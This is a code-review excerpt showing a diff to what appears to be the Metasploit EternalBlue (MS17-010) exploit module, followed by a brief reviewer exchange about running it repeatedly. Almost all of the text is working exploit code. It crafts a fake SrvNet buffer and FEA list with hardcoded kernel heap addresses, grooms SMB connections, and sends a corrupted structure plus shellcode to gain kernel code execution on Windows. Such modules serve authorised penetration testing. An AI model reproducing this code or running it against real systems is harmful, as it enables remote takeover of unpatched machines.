modules/exploits/windows/smb/ms17_010_eternalblue.rb

```diff
@@ -42,96 +45,1067 @@ def initialize(info = {})
+    recv_pkt = RubySMB::SMB1::Packet::Trans2::Response.read(conn.recv_packet)
+    if recv_pkt.status_code.value == 0xc000000d
+      print_good('good response status for nx: INVALID_PARAMETER')
+    else
+      print_error("bad response status for nx: #{recv_pkt.status_code.value}")
+    end
+
+    # one of srvnet_conn struct header should be modified
+    # a corrupted buffer will write recv data in designed memory address
+    srvnet_conn.each { |sk| sk.send(fake_recv_struct + shellcode, 0) }
+
+    # execute shellcode, at this point the shellcode should be located at ffffffff`ffd04180
+    srvnet_conn.each(&:close)
+
+    nx_tree.disconnect!
+    nx_conn.disconnect!
+    nx_sock.close
+
+    tree.disconnect!
+    conn.disconnect!
+    sock.close
+  end
+
+  def create_fea_list(sc_size)
+    fea_list = [0x10000].pack('I<')
+    fea_list += NTFEA_9000
+    fake_srv_net_buf = create_fake_srv_net_buffer(sc_size)
+    fea_list += [0, 0, fake_srv_net_buf.length - 1].pack('CCS<') + fake_srv_net_buf # -1 because first '\x00' is for name
+    # stop copying by invalid flag (can be any value except 0 and 0x80)
+    fea_list += [0x12, 0x34, 0x5678].pack('CCS<')
+    return fea_list
+  end
+
+  def create_fake_srv_net_buffer(sc_size)
+    # 0x180 is size of fakeSrvNetBufferX64
+    total_recv_size = 0x80 + 0x180 + sc_size
+    fake_srv_net_buffer_x64 = "\x00" * 16
+    fake_srv_net_buffer_x64 += [0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR].pack('SSIQ<') # flag, _, _, pNetRawBuffer
+    fake_srv_net_buffer_x64 += [0, 0x82e8, 0].pack('QII<') # _, thisNonPagedPoolSize, _
+    fake_srv_net_buffer_x64 += "\x00" * 16
+    fake_srv_net_buffer_x64 += [0, total_recv_size].pack('QQ<') # offset 0x40
+    fake_srv_net_buffer_x64 += [TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR].pack('<QQ') # pmdl2, pointer to fake struct
+    fake_srv_net_buffer_x64 += [0, 0].pack('QQ<')
+    fake_srv_net_buffer_x64 += "\x00" * 16
+    fake_srv_net_buffer_x64 += "\x00" * 16
+    fake_srv_net_buffer_x64 += [0, 0x60, 0x1004, 0].pack('QSSI<') # MDL.Next, MDL.Size, MDL.MdlFlags
+    fake_srv_net_buffer_x64 += [0, TARGET_HAL_HEAP_ADDR - 0x80].pack('QQ<') # MDL.Process, MDL.MappedSystemVa
+
+    return fake_srv_net_buffer_x64
+  end
+
+  def exploit_eb
+    num_groom_conn = datastore['GroomAllocations'].to_i
+    smbuser = datastore.keys.include?('SMBUser') ? datastore['SMBUser'] : ''
+    smbpass = datastore.keys.include?('SMBPass') ? datastore['SMBPass'] : ''
+
+    sc = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
+
+    if sc.length > MAX_SHELLCODE_SIZE
+      print_error("Shellcode too long. The place that this exploit put a shellcode is limited to #{MAX_SHELLCODE_SIZE} bytes.")
+      return
+    end
+
+    fea_list = create_fea_list(sc.length)
+
+    print_status("shellcode size: #{sc.length}")
+    print_status("numGroomConn: #{num_groom_conn}")
+
+    begin
+      datastore['MaxExploitAttempts'].times { _exploit(fea_list, sc, num_groom_conn, smbuser, smbpass) }
```

Comment:
Just confirming, is this safe to run multiple times in a row? 🤔

Reply:
Removed as this is bad